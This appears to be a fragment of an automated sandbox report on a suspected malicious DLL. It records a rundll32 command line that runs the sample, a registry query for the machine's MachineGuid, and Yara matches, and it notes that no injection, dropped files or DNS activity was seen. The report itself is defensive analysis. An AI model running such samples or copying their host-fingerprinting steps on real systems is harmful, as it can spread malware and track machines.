Source: loaddll64.exe, 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.395951899.00000267603C6000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |
Source: Yara match |
File source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR |
Source: Yara match |
File source: 8082-x64.dll.dll, type: SAMPLE |